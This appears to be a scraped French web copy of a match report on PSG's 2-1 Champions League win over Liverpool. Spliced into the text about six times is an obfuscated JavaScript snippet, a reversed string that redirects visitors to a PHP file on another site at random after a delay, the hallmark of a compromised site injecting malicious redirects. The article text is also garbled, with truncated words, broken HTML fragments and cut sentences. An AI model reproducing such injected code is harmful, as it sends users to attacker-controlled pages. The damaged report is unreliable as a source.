Le PSG bat Liverpool (2-1) et se replace dans la course aux 8es de finale

toire de la phase de poules en venant à bout de Liverpool, mercredi soir au Parc des Princes (2-1). Deux buts de Bernat et Neymar permettent à Paris de garder la main sur son sort : en cas de victoire à Belgrade dans 15 jours, les Parisiens se qualifieront pour les huitièmes de finale.

$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toryfull__paragraph” style=”text-align: justify;”>C’était à la fois une affiche de gala et un rendez-vous couperet. En cas de défaite, le Paris Saint-Germain aurait été bouté hors de la Ligue des champions avant même les huitièmes de finale. Mais le club de la Capitale ne s’est pas loupé. Dans un Parc des Princes plein à craquer et au terme d’une prestation emballante, puis crispante, le PSG s’est offert Liverpool, vice-champion d’Europe en titre et actuel dauphin d’Angleterre (2-1).

Mis sur de bons rails grâce à des buts signés $nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tolink” href=”https://www.eurosport.fr/football/james-milner_prs24911/person.shtml”>James Milner sur penalty (45e+1). toire (voire un nul) enverra les Parisiens en huitièmes de finale.

$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tolink” href=”https://www.eurosport.fr/football/thomas-tuchel_prs217443/person.shtml”>Thomas Tuchel ont d’abord réalisé un premier quart d’heure de grande qualité. $nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tolink” href=”https://www.eurosport.fr/football/kylian-mbappe_prs440181/person.shtml”>Kylian Mbappé (12e) ont chauffé les gants d’Alisson. Le portier brésilien n’a en revanche rien pu faire sur la frappe à ras de terre de Juan Bernat, opportuniste et efficace à la suite d’un dégagement raté de Virgil Van Dijk (13e).

toryfull__content-picture–picture” style=”text-align: justify;”>

Juan Bernat
$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toryfull__content-picture-legend-agency”>Getty Images

Paris s’en est remis à sa défense

toriale des Reds, qui se sont exposés à des contres. Et c’est justement sur l’une de ces attaques rapides que les locaux ont fait le break, Neymar concluant du gauche après une parade d’Alisson devant totale d’inspiration, le finaliste malheureux de la précédente édition méritait assurément de rejoindre les vestiaires avec deux longueurs de retard au tableau d’affichage. Mais Angel Di Maria a taclé irrégulièrement Sadio $nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toryfull__paragraph” style=”text-align: justify;”>Relancés par ce but survenu juste avant la pause, les Scousers ont eu la maîtrise du ballon pendant la majeure partie du second acte. Ils n’ont toutefois pas réussi à mettre and manque d’imagination à l’approche du but adverse. La faute, aussi, à une remarquable défense de la part du PSG. Thiago Silva a été impérial, Marquinhos a toujours été bien placé, Presnel Kimpembe a fait preuve d’une sérénité parfois à la limite de l’insolence… et, surtout, l’équipe entière s’est mise au diapason. Paris a tremblé, c’est une évidence. Mais Paris a tenu bon en s’appuyant sur sa solidarité défensive. Et c’est l’essentiel.

ands rendez-vous, le PSG a apporté une réponse claire. Pas grâce à ses individualités, mais par l’intermédiaire de son collectif. Dans deux semaines, Kylian Mbappé et consorts débarqueront en Serbie avec la certitude qu’une victoire au Marakana de Belgrade sera synonyme de qualification pour les huitièmes de finale. Quoi qu’il arrive.

Source: Eurosport

  • 8
  •  
  •  
  •  
  •  
    8
    Partages
  • 254
    Partages

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

%d blogueurs aiment cette page :